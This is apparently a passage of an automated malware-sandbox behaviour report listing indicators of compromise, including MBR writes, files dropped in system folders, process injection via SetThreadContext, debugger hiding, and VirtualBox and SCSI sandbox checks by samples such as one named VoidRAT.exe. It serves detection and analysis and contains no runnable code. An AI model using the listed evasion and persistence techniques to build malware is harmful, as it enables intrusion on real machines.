Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 360TS_Setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum tuc4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum is-I2SOJ.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum DpJ873NtgAlrFVbXX7h6FnM9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum 360TS_Setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum VoidRAT.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum NBYS%20ASM.NET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum qhD0Fjd2sS2bPUQL1AQPs2sm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum hreeirv Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 IEXPLORE.EXE Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 jxszdjp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum IEXPLORE.EXE Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 hreeirv Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum StringIds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 Synaptics.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 BroomSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum InstallUtil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 UdioConverterRipper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum qI7aPgVljoENRNVrUTEUh6Bq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum qhD0Fjd2sS2bPUQL1AQPs2sm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum InstallUtil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 qhD0Fjd2sS2bPUQL1AQPs2sm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 qhD0Fjd2sS2bPUQL1AQPs2sm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 is-I2SOJ.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum jxszdjp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum is-RKAFE.tmp Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 hueeirv Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 NBYS%20ASM.NET.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 VoidRAT.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 tuc4.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 is-RKAFE.tmp Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 uLBknOhgdGBcPr4C2VIutNtS.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 StringIds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum Synaptics.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 jsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum qhD0Fjd2sS2bPUQL1AQPs2sm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum assistant_installer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum 5OOy4aNueB5QpC3S0HgRtZvH.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum hueeirv Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum jsc.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 360TS_Setup_Mini_WW.Datacash.CPI202304_6.6.0.1054.exe File opened for modification \??\PhysicalDrive0 360TS_Setup.exe -
Drops file in System32 directory 42 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive schtasks.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini BbAXLjX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 ucMKVtG.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol ucMKVtG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\49C555742982D57C7C177BAF9E010F56 ucMKVtG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ucMKVtG.exe File opened for modification C:\Windows\SysWOW64\Ghxyq.exe srr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies ucMKVtG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 ucMKVtG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache ucMKVtG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ucMKVtG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_625B6A317EF9FBF256D00704E8512DA8 ucMKVtG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_ACE741CAE478F9E8195FFCECA66B0544 ucMKVtG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_88EBB75330F011510D20435757A61CC3 ucMKVtG.exe File created C:\Windows\SysWOW64\Ghxyq.exe srr.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE ucMKVtG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_625B6A317EF9FBF256D00704E8512DA8 ucMKVtG.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft ucMKVtG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\49C555742982D57C7C177BAF9E010F56 ucMKVtG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_88EBB75330F011510D20435757A61CC3 ucMKVtG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData ucMKVtG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content ucMKVtG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA ucMKVtG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_ACE741CAE478F9E8195FFCECA66B0544 ucMKVtG.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive reg.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol BbAXLjX.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 ucMKVtG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA ucMKVtG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 ucMKVtG.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
pid Process 4764 schtasks.exe 1908 explorer.exe 1908 explorer.exe 1908 explorer.exe 1908 explorer.exe 1908 explorer.exe 1908 explorer.exe 1908 explorer.exe 4288 Synaptics.exe 2156 jxszdjp.exe 4288 Synaptics.exe 4288 Synaptics.exe 4288 Synaptics.exe 2156 jxszdjp.exe 2156 jxszdjp.exe 2156 jxszdjp.exe 5148 reg.exe 3748 AUTOKEY.exe 3844 explorer.exe 4616 NBYS%20ASM.NET.exe 3844 explorer.exe 4616 NBYS%20ASM.NET.exe 3844 explorer.exe 4616 NBYS%20ASM.NET.exe 4616 NBYS%20ASM.NET.exe 3844 explorer.exe 3844 explorer.exe 3844 explorer.exe 3844 explorer.exe 5680 rundll32.EXE 3732 IEXPLORE.EXE 3968 explorer.exe 1384 UdioConverterRipper.exe 3968 explorer.exe 3968 explorer.exe 1384 UdioConverterRipper.exe 1384 UdioConverterRipper.exe 1384 UdioConverterRipper.exe 3732 IEXPLORE.EXE 3732 IEXPLORE.EXE 3732 IEXPLORE.EXE 3732 IEXPLORE.EXE 3732 IEXPLORE.EXE 4976 360TS_Setup.exe 4976 360TS_Setup.exe 4976 360TS_Setup.exe 4976 360TS_Setup.exe 3968 explorer.exe 3968 explorer.exe 3968 explorer.exe 3968 explorer.exe 4112 139k3s9mie973k.exe 4880 explorer.exe 4880 explorer.exe 4880 explorer.exe 4880 explorer.exe 4880 explorer.exe 4880 explorer.exe 4880 explorer.exe 688 360TS_Setup.exe 688 360TS_Setup.exe 688 360TS_Setup.exe 688 360TS_Setup.exe 1200 139k3s9mie973k.exe -
Suspicious use of SetThreadContext 21 IoCs
description pid Process procid_target PID 4344 set thread context of 392 4344 updater.exe 162 PID 4344 set thread context of 1552 4344 updater.exe 168 PID 2608 set thread context of 1476 2608 ghjk.exe 210 PID 2492 set thread context of 1108 2492 BLduscfibj.exe 212 PID 2532 set thread context of 3196 2532 ama.exe 218 PID 2964 set thread context of 4304 2964 0j4.exe 231 PID 1432 set thread context of 3508 1432 netsh.exe 237 PID 4652 set thread context of 4664 4652 reg.exe 239 PID 480 set thread context of 2380 480 InstallSetup2.exe 247 PID 1476 set thread context of 4012 1476 hv.exe 254 PID 4736 set thread context of 5980 4736 Tags.exe 416 PID 4664 set thread context of 4848 4664 StringIds.exe 417 PID 5980 set thread context of 5896 5980 Tags.exe 420 PID 4848 set thread context of 1284 4848 InstallUtil.exe 427 PID 5500 set thread context of 5724 5500 hreeirv 493 PID 5280 set thread context of 4888 5280 izhoqjhi.exe 502 PID 5896 set thread context of 2944 5896 RegSvcs.exe 507 PID 5940 set thread context of 5376 5940 SupportsDynamicPartitions.exe 511 PID 5376 set thread context of 780 5376 SupportsDynamicPartitions.exe 513 PID 780 set thread context of 1076 780 aspnet_compiler.exe 515 PID 1076 set thread context of 5060 1076 aspnet_compiler.exe 536 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN JYQvDsNLyD1BiHmpCiD5dmqQ.exe File opened (read-only) \??\VBoxMiniRdrDN AhjRPOGDGfLEDTGgehsebysf.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\ClocX\Presets\Alte Standuhr.png cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\domeclock\domemin.png cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\Violeta.png cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\WidestoneStudios.png cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Lang\Brazilian Portuguese.lng cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\apple.ini cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\aqua-clock2.bmp cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\hallow.ini cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\greenmarble\marblemin.png cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\Amarillo.png cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\dragon.bk cxcfHffNmhPEQy61bLBMgSz0.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak ucMKVtG.exe File created C:\Program Files (x86)\ClocX\BackupAlarms.bat cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Lang\Ukrainian.lng cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\BlueBallOnlyDots.ini cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\hallow.png cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\woodone\woodmin.png cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files (x86)\ClocX\Presets\earth.ini cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\Neon.ini cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\Omega.png cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\wonderglobe2.ini cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\AJ-CityHall-500-hour.hpng cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\Casio.png cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\MickeyMouse.ini cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\Original.png cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\BlueBallRoman.ini cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\Naranja.png cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\IvyLace.ini cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\BaiWeather.ini cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\hallow2.ini cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\negro2.ini cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Lang\Korean.lng cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\BallClockAqua.png cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\BlueSphere2.png cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\BubbleClock.ini cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\iToolsClock.bmp cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\360\360Safe\deepscan\speedmem2.hg cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\AquaLarge.png cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\BlackClock.bmp cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\Jaguar2.png cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\Wall Clock medium-sec.hpng cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Lang\Srpski.lng cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\CarpeDiem.ini cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\GuldKugler.ini cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\Nvidia2.png cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\Citizen.png cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\DSX4.BMP cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\IvyLace.png cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\DarkCrystalBall\minutehand-7.png cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\Aqua.bmp cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Lang\Svenska.lng cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Lang\Turkce.lng cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\AJ-CityHall-500-minute.hpng cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\BlueAppleClock.ini cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\Verde.png cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\hallow2.png cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\mQvpiNUsNPjLC\PeZyqMR.dll ucMKVtG.exe File created C:\Program Files (x86)\ClocX\Lang\Russian.lng cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\PEKrPVrLutUn\HEtbHDX.dll ucMKVtG.exe File created C:\Program Files (x86)\ClocX\Lang\Slovenian.lng cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\BallClockAmber.png cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\Comdex - Omega1.png cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Program Files (x86)\ClocX\Presets\Jaguar.bmp cxcfHffNmhPEQy61bLBMgSz0.exe -
Drops file in Windows directory 11 IoCs
description ioc Process File opened for modification C:\Windows\rss AhjRPOGDGfLEDTGgehsebysf.exe File created C:\Windows\rss\csrss.exe AhjRPOGDGfLEDTGgehsebysf.exe File opened for modification C:\Windows\rss JYQvDsNLyD1BiHmpCiD5dmqQ.exe File created C:\Windows\rss\csrss.exe JYQvDsNLyD1BiHmpCiD5dmqQ.exe File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\Tasks\tCfKGXDvAPRRvLf.job schtasks.exe File created C:\Windows\Panther\UnattendGC\ShellSysMenu.dll cxcfHffNmhPEQy61bLBMgSz0.exe File created C:\Windows\Tasks\bgKZxxDIOpRGITjYTe.job schtasks.exe File created C:\Windows\Tasks\OvvioKEypuBLsTFYZ.job 139k3s9mie973k.exe File created C:\Windows\Tasks\hNXJOWJzZwASvpUks.job schtasks.exe -
Launches sc.exe 11 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3440 sc.exe 1848 sc.exe 3928 sc.exe 408 sc.exe 1916 sc.exe 2280 sc.exe 1624 sc.exe 1832 sc.exe 5004 sc.exe 5892 sc.exe 3888 sc.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral3/files/0x00060000000232df-4978.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 28 IoCs
pid pid_target Process procid_target 1840 4836 WerFault.exe 127 4456 3104 WerFault.exe 174 3852 4768 WerFault.exe 179 3456 4148 WerFault.exe 206 5464 2776 WerFault.exe 263 1404 1908 WerFault.exe 248 5364 4544 WerFault.exe 84 5144 3844 WerFault.exe 313 5060 3968 WerFault.exe 346 2944 4880 WerFault.exe 428 4948 864 WerFault.exe 460 948 3852 WerFault.exe 498 3668 2268 WerFault.exe 506 5368 4632 WerFault.exe 514 5148 5064 WerFault.exe 519 2816 4000 WerFault.exe 523 3172 4888 WerFault.exe 527 460 5164 WerFault.exe 531 5388 2316 WerFault.exe 535 5132 4744 WerFault.exe 557 1208 5392 WerFault.exe 566 4196 4536 WerFault.exe 574 956 2188 WerFault.exe 578 5276 2004 WerFault.exe 587 5392 3120 WerFault.exe 581 4304 3204 WerFault.exe 598 5364 2596 WerFault.exe 607 4052 3452 WerFault.exe 610 -
NSIS installer 4 IoCs
resource yara_rule behavioral3/files/0x0007000000023305-7056.dat nsis_installer_1 behavioral3/files/0x0007000000023305-7056.dat nsis_installer_2 behavioral3/files/0x000b00000002335b-8494.dat nsis_installer_1 behavioral3/files/0x000b00000002335b-8494.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 21 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hueeirv Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hueeirv Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hueeirv Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI f4438ed05971a15d70c9683dc9e1a55c583ea8c61039e9e85eb391ca6e3fa0ae.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hueeirv Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags dwm.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hueeirv Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hueeirv Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hueeirv Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hueeirv Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cb0e88abe7aee128ff8635e44df9797d0224aff000d03fc5d9166e575b50f4a1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI hueeirv Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe -
Checks processor information in registry 2 TTPs 63 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 139k3s9mie973k.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 schtasks.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 139k3s9mie973k.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 139k3s9mie973k.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 139k3s9mie973k.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 139k3s9mie973k.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key value queried 